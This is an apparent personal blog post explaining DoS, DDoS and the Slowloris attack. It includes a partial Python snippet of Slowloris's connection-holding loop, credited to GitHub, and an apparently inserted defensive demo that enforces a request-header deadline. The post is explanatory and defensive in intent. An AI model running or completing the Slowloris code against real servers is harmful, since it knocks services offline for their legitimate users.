Gichuki P Mwangi

DDoS Attack!

A cyber attack on a machine can have catastrophic repercussions, and this is not limited to simple machines. Every single machine is vulnerable in one way or another; all it takes is a small lapse in security. Cyber attacks can bring a business to its knees and halt the operations of sophisticated governments. Some of these attacks require massive resources, but others are simple and very effective: they require a single, ordinary computer, nothing more. Read on as the Slowloris DoS attack is unmasked.

DISCLAIMER: Please do not try using the code on this website to perform any kind of attack; you could potentially land in trouble, and I won't be there to help.

DoS is an abbreviation for Denial of Service. It is a type of cyber attack performed with the intention of making a machine or network resource unavailable to its intended users, by temporarily or permanently disrupting the services of a host connected to the internet. To achieve this, the attacker (hacker) intentionally sends many repetitive requests, flooding the host system. Since the system treats all of these requests as though they were valid HTTPS requests, it processes them, and every request placed after them is kept waiting for a definite or indefinite amount of time. This kind of attack can be carried out from a single computer.

There are times when the attacker has access to more than one computer, whether legally or illegally. In that case they can have all of these computers send requests to the same host simultaneously, in a controlled fashion. This kind of attack is called a Distributed Denial of Service (DDoS) attack. The terms DDoS and DoS are often used interchangeably, but it is important to differentiate them.

To understand how it works, consider this analogy.
You host a party and invite about 100 people. Of these 100 people, 5 are VIPs and 95 are ordinary guests. There is one door to the room where the party is held, and everyone is due to start arriving at 9pm. The ordinary guests learn about the VIP list and swear to inconvenience the VIPs. A few minutes before 9pm they arrive, crowd into the VIP section and refuse to leave. Where shall your VIPs sit? They have to wait for you to evict the ordinary guests, or walk away from the party.

DoS attacks have been easily fixed, and that is because the problem has existed for quite some time now. There are three ways of fixing a normal DoS attack:
☛ Blocking an IP address based on the number of HTTP requests it makes.
☛ Blocking an IP address based on the velocity (rate) of its HTTP requests.
☛ Blocking an IP address based on the number of status codes it generates.

A distributed DoS is harder to defend against, but still very much preventable. The difficulty arises from the fact that the attacking machines are located in many different places in a region or across the world. Still, these attacks are well known, and many out-of-the-box solutions exist for defending against them.

Because such ordinary DoS / DDoS attacks are no longer really viable, Slowloris is all the more interesting because of how it works. A Slowloris attack can be either DoS or DDoS.

It works by exploiting poor handling of unreliable network connections by the server, which is why it is quite difficult to mitigate. There is a solution, and we'll get to it in a moment. There are certainly places where network connectivity is interrupted often: an underground tunnel, say, or an open area where the signal is weak. The server needs to take such cases into account and ensure that nobody is blocked from accessing the website because of network-related issues. That tolerance is where the exploit comes from.

For each HTTP request, there are characters that signify its beginning and its end. When you send a request, you tell the server that your request has ended by sending these special characters at some point. If you send a request but never send the characters signifying its end, you normally get a server timeout, so that you do not hold up resources that are needed by someone else. To make use of the exploit, Slowloris sends a valid HTTP request and then sends a small fragment of the request every few seconds, indefinitely, but never sends the characters that mark the end of the HTTP request. The server therefore never times out and keeps waiting for the request to complete. Take note that the resource used to process this request is not released for an indefinite amount of time.

Unlike other DDoS / DoS attacks, Slowloris does not use a lot of bandwidth. In fact, it uses a very small amount of it repeatedly, with the aim of using up server resources with HTTP requests that look valid but are very slow. The server is therefore never able to release the open partial connections, because it is waiting for the request(s) to complete.
Below is a snippet of Slowloris code in Python. I have borrowed it from GitHub, where you can view the full code.

Code Snippet.

def main():
    ip = args.host
    socket_count = args.sockets
    logging.info("Attacking %s with %s sockets.", ip, socket_count)
    logging.info("Creating sockets...")
    # Open the initial set of connections, each left with an unfinished request header
    for _ in range(socket_count):
        try:
            logging.debug("Creating socket nr %s", _)
            s = init_socket(ip)
        except socket.error:
            break
        list_of_sockets.append(s)
    while True:
        try:
            logging.info("Sending keep-alive headers... Socket count: %s", len(list_of_sockets))
            # One more header line per connection, never the blank line that ends the request
            for s in list(list_of_sockets):
                try:
                    s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
                except socket.error:
                    list_of_sockets.remove(s)
            # Replace any connections the server managed to close
            for _ in range(socket_count - len(list_of_sockets)):
                logging.debug("Recreating socket...")
                try:
                    s = init_socket(ip)
                    if s:
                        list_of_sockets.append(s)
                except socket.error:
                    break
            time.sleep(15)
        except (KeyboardInterrupt, SystemExit):
            print("\nStopping Slowloris...")
            break


if __name__ == "__main__":
    main()

Obviously I have left quite a chunk of code out of the snippet, but you can view it on GitHub.
To mitigate the attack, you need some configuration added on your server. Luckily, your website host has most definitely done the relevant configuration for you, so you need not worry at all.
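The server-side configuration referred to above typically puts a deadline on receiving the complete request header. The following Python is an added illustration of that defence, not code from the article or from the GitHub project it borrows from: a loopback listener gives each connection a fixed time to deliver the header terminator "\r\n\r\n" and drops connections that only trickle header lines. The deadline, the loopback port and the two client behaviours are constructed for the demonstration.

```python
import socket
import threading
import time

HEADER_END = b"\r\n\r\n"  # the bytes that terminate an HTTP request header

def read_request_header(conn, deadline):  # returns "complete", "slow_header" or "closed"
    start = time.monotonic()
    buf = b""
    while HEADER_END not in buf:
        remaining = deadline - (time.monotonic() - start)
        if remaining <= 0:
            return "slow_header"
        conn.settimeout(remaining)  # no single recv may wait past the overall deadline
        try:
            chunk = conn.recv(1024)
        except socket.timeout:
            return "slow_header"
        if not chunk:
            return "closed"
        buf += chunk
    return "complete"

def simulate(client_behaviour, deadline=0.5):
    verdict = {}
    with socket.socket() as listener:  # loopback listener on an ephemeral port
        listener.bind(("127.0.0.1", 0))
        listener.listen(1)
        def server():
            conn, _ = listener.accept()
            with conn:  # closing conn frees the worker the client was occupying
                verdict["status"] = read_request_header(conn, deadline)
        t = threading.Thread(target=server)
        t.start()
        with socket.create_connection(listener.getsockname()) as c:
            try:
                client_behaviour(c)
            except OSError:
                pass  # the server already dropped us, as expected for the trickling client
        t.join()
    return verdict["status"]

def well_behaved_client(c):
    c.sendall(b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n")

def trickling_client(c):  # constructed: header lines keep coming, the terminator never does
    c.sendall(b"GET / HTTP/1.1\r\nHost: example.test\r\n")
    for _ in range(3):
        time.sleep(0.3)
        c.sendall(b"X-a: 1\r\n")
```

Run simulate(well_behaved_client) and simulate(trickling_client) to see the first connection accepted and the second dropped at the deadline, which is the same budget that server-side request-timeout settings enforce.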

Gichuki P. Mwangi

A computer scientist with a passion to solve real world, day to day problems using new computer technologies and those already in existence.

2 thoughts to "DDoS Attack!"

  1. I really would like to know more about hacking and test it in a real environment. I will check out the code on GitHub.
    Thanks for the article.
